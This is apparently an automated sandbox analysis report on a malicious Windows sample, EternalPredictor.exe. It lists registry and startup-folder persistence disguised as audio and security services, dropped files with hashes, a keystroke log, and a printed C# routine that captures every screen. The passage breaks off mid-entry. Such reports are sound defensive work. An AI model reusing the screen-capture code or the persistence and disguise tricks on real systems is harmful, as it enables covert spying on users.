                                                                                                                                                                                                                                Analysis stop reason:Critical Process Termination
                                                                                                                                                                                                                                Sample name:EternalPredictor.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.rans.troj.adwa.spyw.expl.evad.winEXE@170/58@5/4
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 30%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 61%
                                                                                                                                                                                                                                • Number of executed functions: 140
                                                                                                                                                                                                                                • Number of non-executed functions: 168
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 172.217.16.195
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, gstatic.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                • Execution Graph export aborted for target EternalPredictor.exe, PID 2852 because it is empty
                                                                                                                                                                                                                                • Execution Graph export aborted for target SecurityHealthSystray.exe, PID 3948 because it is empty
                                                                                                                                                                                                                                • Execution Graph export aborted for target XClient.exe, PID 6540 because it is empty
                                                                                                                                                                                                                                • Execution Graph export aborted for target XClient.exe, PID 7084 because it is empty
                                                                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 2212 because it is empty
                                                                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7984 because it is empty
                                                                                                                                                                                                                                • Execution Graph export aborted for target skuld.exe, PID 3872 because it is empty
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                05:21:20API Interceptor2x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                                05:21:22API Interceptor7687549x Sleep call for process: eternal.exe modified
                                                                                                                                                                                                                                05:21:25API Interceptor142x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                11:21:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                                                                                                                                                                11:21:24Task SchedulerRun new task: XClient path: C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                                11:21:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                                11:21:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                                                                                                                                                                11:21:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                                11:21:57AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\EternalPredictor.exe.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\EternalPredictor.exe
                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):654
                                                                                                                                                                                                                                Entropy (8bit):5.380476433908377
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                                                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                                                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                                                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                                                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):654
                                                                                                                                                                                                                                Entropy (8bit):5.380476433908377
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                                                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                                                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                                                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                                                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:@...e...........................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\ ? ? \Display (1).png

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):448373
                                                                                                                                                                                                                                Entropy (8bit):7.925553642784118
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:k5JBrPvEtHK6VxR6r4AIo4PSI6rh3qHDuw3RaD3PxeICSylGnafSC5oUMAWwMF9I:klyPPGpbTpFCStSnRMqa1GLz3ZClW
                                                                                                                                                                                                                                MD5:7E8C4FE8EB788DC6AFB97B328DF86A65
                                                                                                                                                                                                                                SHA1:42723617EA47C453B5A5E0BE374A407FCE3B3DFD
                                                                                                                                                                                                                                SHA-256:3D9EB23038D60B4CE4AF676A5D487A88B14DC8F39450D4C5194427820E14A4F0
                                                                                                                                                                                                                                SHA-512:4A5F922419336782FD1B8660BDD75F9240974CCA957329E1720BC28BD547DD1A6226AD25862B6418AB90796C3E111F4C95467547B87A900DBCCD06D40575D1F1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....].u...}.z.w..M..{/....?N.....}y..;Nlc....=....q......}/z..v.`....$....}...!.#....~..]g..}..1.QU.f.Zgk..|..V.v.k...i..&.9..U~.k......j..{.e.....9....~...7"}..x_.d$....5@..U.v.+.......-..G...T..)+6.'..A..^..}'..-....mA..C.~....WP?vY..^S;fiG..=t.?XR.7L.G.4,.......zJ...wE_F.;.........s..[.....gZ.....w@..q.!....+...T..................g.}../...~../.aP......k.....m.g.iI.g|.>.p....O=...1.~$..h.X>..!.V}.......~`.O._..........B.....O>......../.w....}..(.L..'..G..{C......q\?..c\k..|..1..xd.q.....~w'4....*6.....q.......J....=..3.N.q......s...........7..P.{A..5?..../.[.i,....=aB.....b..8.b...i.q......X_..m.q...0v.o...=........b.f.......}.K;n..~..nw...w....x?{...}n..v{.c..w.Vlk.....5/1f.x.]KK....g.......Z....[.....'..s........}.nM..|[....lB..s.y...iq.......v.5.....7B.>.j............5;..q}l5..c....?%^7..)O.g....s..c...m{C.o.s.M.)...q-.t=.16...

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.0.cs

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1004
                                                                                                                                                                                                                                Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):609
                                                                                                                                                                                                                                Entropy (8bit):5.327664507012047
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5CHhJV:p37Lvkmb6KOkqe1xBkrk+ikbNJ+WZEvX
                                                                                                                                                                                                                                MD5:A9AE9B66BDE4219B04913CB4FCA08B51
                                                                                                                                                                                                                                SHA1:2EC62B5A34C7B165AACE9A64C89D2A53A7739711
                                                                                                                                                                                                                                SHA-256:66FEDCC7BB255562CE0A93940D0615A27291A1DE9DAF2CE116503A387BFE62C1
                                                                                                                                                                                                                                SHA-512:DD8A3FEF00299408641FE09B03094CBA6869216FDF3DD07D20408090071F6A184B2768E9483EFC7FC3180F378C407B00CBA821F181F503AAA57C8BE5A3424B2D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.0.cs"

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4096
                                                                                                                                                                                                                                Entropy (8bit):3.1566406826290354
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:6M7oEAtf0KhzBU/rJzf6mtJGN0tpW1ullta36uq:4Nz0rJGm+OFXtK6
                                                                                                                                                                                                                                MD5:F0A246323C87348A3074B710BEADFC55
                                                                                                                                                                                                                                SHA1:815E0EBEF004B7373313FDEEB75752417C8A8366
                                                                                                                                                                                                                                SHA-256:42390336EA2091A1745F571A85F00463F595D46B7A49CCDC9255845F621007CE
                                                                                                                                                                                                                                SHA-512:216DFA92DB0D6FC445F6D5F2A85378288F850DDC6F11D3ADE84B229DA6222AC516E19754C2A6274FB3BF4342A968789A66D6C82DF10FA7E7D8ABB50DA55B872F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K.9g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.out

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):1152
                                                                                                                                                                                                                                Entropy (8bit):5.4935664959751636
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:K6FdId3ka6KOkqeFkbNJ/EveKax5DqBVKVrdFAMBJTH:vFdkka6NkqeFkbNJ/EveK2DcVKdBJj
                                                                                                                                                                                                                                MD5:5121C4BB1FD5ED7E7875006E4D61A926
                                                                                                                                                                                                                                SHA1:298497A71D3767787562578489E405328059728E
                                                                                                                                                                                                                                SHA-256:6FFF6833FA9D2A77F1B7E204BEAAB18A2674E78B0F4E3A0CFC9F201CA1F96FC8
                                                                                                                                                                                                                                SHA-512:5EF055EC6A860612D3AE8000118DC265F48AC2F4DEEF3E9735DEB50FE7F290DAFD0F9AEAFDDF706F9ED3712B87838BC76494DBF1DAA61FC9717FE59DF109E095
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no lo

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\3pyiazzo\CSC68A32BD75EFB4A1F8C11C6C63FDD8E5.TMP

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                File Type:MSVC .res
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):652
                                                                                                                                                                                                                                Entropy (8bit):3.096695479751756
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryntak7Ynqq6iPN5Dlq5J:+RI+ycuZhNltakS6iPNnqX
                                                                                                                                                                                                                                MD5:2F6FD1E6FB535F61757E8738FF2E26F1
                                                                                                                                                                                                                                SHA1:C869366C1FF39786CC6ACB090EB492C5F93B99BF
                                                                                                                                                                                                                                SHA-256:2FA62FE1E99AB7635E2B5F3ADF48EB849AB667B56B2238B4DA8A77B49830DCFF
                                                                                                                                                                                                                                SHA-512:DA8AA7F7756DAF9CA93CAD25DF120AF93533E4BECA6DF189DEB0FF2399273DEA2125D130942C7B237EC98A8AAC24CD1D682FE14ACBFB5F5834F48494C9DF8EB4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.p.y.i.a.z.z.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.p.y.i.a.z.z.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\eternal.exe
                                                                                                                                                                                                                                File Type:Generic INItialization configuration [WIN]
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):183
                                                                                                                                                                                                                                Entropy (8bit):4.663293397063965
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovLvAFkjDCHyg4EaKC5Suf1XieAzT2cW8g/FsrTk:EFYJKDoWr5FYJKDoMFkPCHhJaZ5SudXd
                                                                                                                                                                                                                                MD5:0C7CA14AA339FD4004DFF23D71C4B9F1
                                                                                                                                                                                                                                SHA1:66209C445354464ACF89E5CAE83ED08F3C5254D4
                                                                                                                                                                                                                                SHA-256:66D65553E5CCBCCC9FA20D7B373DD35CA234875B6E2CC2171254006BA9B4DA96
                                                                                                                                                                                                                                SHA-512:39C068DA0BBB45CBDE241C56F97E15AF8DE798BB7BD8F2D7BA05EB0EC9A70AAE6D30D0B16F2AB12693F4F3F916F1309B1F7C976D3280A501EB5BFFF69AF97BC8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r....### C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe ###..[WIN]r....### explorer ###..[WIN]r

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RES2A5B.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ba, 9 symbols, created Sun Nov 17 11:45:15 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1376
                                                                                                                                                                                                                                Entropy (8bit):4.132412164356126
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:HeO9wrqpHLwKeFGkNwI+ycuZhNltakS6iPNnqSQEgd:YqpcKeFRm1ullta36uqSZ0
                                                                                                                                                                                                                                MD5:3F6657CD0AB612284E292511E5090BED
                                                                                                                                                                                                                                SHA1:87C5DEAD367AB063FA400AFF0826BA1645F9075C
                                                                                                                                                                                                                                SHA-256:36014D28F930A4969F2E94475D3E45793C550C205F382B6C9DAA7F2E6C5CB30E
                                                                                                                                                                                                                                SHA-512:381FBB1492972051A7F0D8ADB7BA45A19E8FC26EB386F92B430C2C5D3D9C683AE9DD1CE50DBD5DD7DA364C7049734B72A89DD37312060A0B47539C1A9F4885D6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:L...K.9g.............debug$S........|...................@..B.rsrc$01........X.......`...........@..@.rsrc$02........P...j...............@..@........T....c:\Users\user\AppData\Local\Temp\3pyiazzo\CSC68A32BD75EFB4A1F8C11C6C63FDD8E5.TMP.............../o...S_au~.8..&...........5.......C:\Users\user\AppData\Local\Temp\RES2A5B.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.p.y.i.a.z.z.o...d.l.l.....(.....L.e.

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI44642\VCRUNTIME140.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):120400
                                                                                                                                                                                                                                Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                                MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                                SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                                SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                                SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI44642\_bz2.pyd

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):49424
                                                                                                                                                                                                                                Entropy (8bit):7.815740675307968
                                                                                                                                                                                                                                Encrypted:false
